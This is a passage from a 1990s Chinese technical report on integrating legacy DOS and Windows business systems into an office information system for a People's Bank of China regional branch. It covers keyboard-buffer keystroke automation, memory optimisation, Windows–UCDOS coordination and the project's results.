不理想,操作步骤及系统反应时间较长。第二方案用户界面良好,操作管理简便,但由于系统叠加层次较多,因此需解决内存及其它资源限制及冲突等问题。经过努力我们成功地按第二方案实施,使得原来五花八门而显得零乱的多个系统在WINDOWS下集成起来,形成一个有机的整体。6.3键盘缓冲区操作

因为办公信息服务系统的使用者是人行广西区分行的高层领导,因此除了要求界面美观之外,还特别要求使用简便。由于我们将各原有系统集成到我们的软件中,而各原有系统一般功能繁多,并多需要输入口令等繁琐的步骤才能进入到领导们所需的查询功能,因此我们采用预先将这些操作的字符序列自动写入键盘缓冲区的办法,将这些步骤“短路”,领导们在调用该业务系统时就直接进入到查询功能。

在对DOS环境下运行的业务系统,我们采用直接向键盘缓冲区写入字符序列,以简化操作的方法。采用这种方法需要掌握写入的时机,否则及容易造成不可预见性的结果以致死机。由于用户将要在不同业务系统中来回选择,因此键盘缓冲区操作程序在内存的驻留方式也是一个需要处理好的问题,否则会出现内存管理混乱等问题。经过反复尝试我们找到了解决问题的方案,采用从WINDOWS调用DOS进程及UCDOS之后,调用键盘缓冲区操作程序,将操作序列写入到键盘缓冲区,然后再调用业务系统,由系统自动按键盘缓冲区的字符序列进入业务系统的查询操作,在退出业务系统时,由WINDOWS自动清除内存中的UCDOS及键盘缓冲区操作程序,使内存恢复到调用前原状。在处理WINDOWS环境中运行的业务系统时,我们在进入系统前直接调用键盘缓冲区操作程序,将操作序列写入到键盘缓冲区,然后调用业务系统,让其自动按键盘缓冲区序列进入到其查询功能。

6.4内存优化

采用这种集成方案,内存将要容纳网络驱动程序,WINDOWS,UCDOS,FOXBASE,业务系统,DOS解释程序等,因此常常会遇到内存不足的问题,采用优化内存是解决内存不足的一种方法,我们采用DOS的MEMMAKER来优化内存,以解决基本内存不足的问题。

6.5WINDOWS与UCDOS协调工作

由于系统主框架是运行于WINDOWS环境,而业务系统许多是在DOS环境下UCDOS环境中运行,这就涉及中文WINDOWS与UCDOS协调工作的问题,如果先进UCDOS,然后执行WINDOWS,则会造成显示方式冲突,系统无法使用,反之,先进WINDOWS然后再调用DOS进程,进入UCDOS,则使用顺畅,并且在退出DOS进程后,内存没有任何残留。

6.6解决内存不足问题

采用直接集成方案,内存将要容纳网络驱动程序、WINDOWS、UCDOS、FOXBASE,业务系统,DOS解释程序等,因此常常会遇到内存不足的问题,采用优化内存是解决内存不足的一种方法,但只能解决部分基本内存不足的问题,在许多情况下仍需采用别的方法。如某处业务软件是在FOXBASE下运行的.FOX程序,该.FOX程序调用DOS命令,这样内存中将要容纳网络驱动程序,中文WINDOWS3.2,DOS,UCDOS5.0,键盘操作驻留程序,FOXBASE,该.FOX及DOS命令解释程序,从而造成内存不足。为解决这一问题,我们找来了反编译程序,将.FOX文件反编译成.PRG文件,然后用FOXPRO2.5,将其编译成.EXE文件,这样在调用它时,就无需执行FOXBASE,从而解决这种内存不足的问题。

7成果

在进行项目开发的过程中我们曾查阅许多资料,没有人曾介绍用类似的方案进行系统集成的经验。因此在项目开发完成前,我们一直担心,最后的系统会不会是个“四不象”,但我们惊喜地发现,我们的系统不仅功能强大,性能可靠,而且各部分衔接自然,使用极其方便。这种系统集成方法是一种新颖的方法。为在大型企业及机构已有的软件系统基础上进行系统集成创造了一种巧妙简截而又成功的解决方案。

9参考文献

[1]PowerBuilder5.0技术参考手册(套)北京市晓通网络数据库研究所

[2]Excel5forwindows大全,海洋出版社

[3]WINDOWSNT3.51技术手册(套),微软公司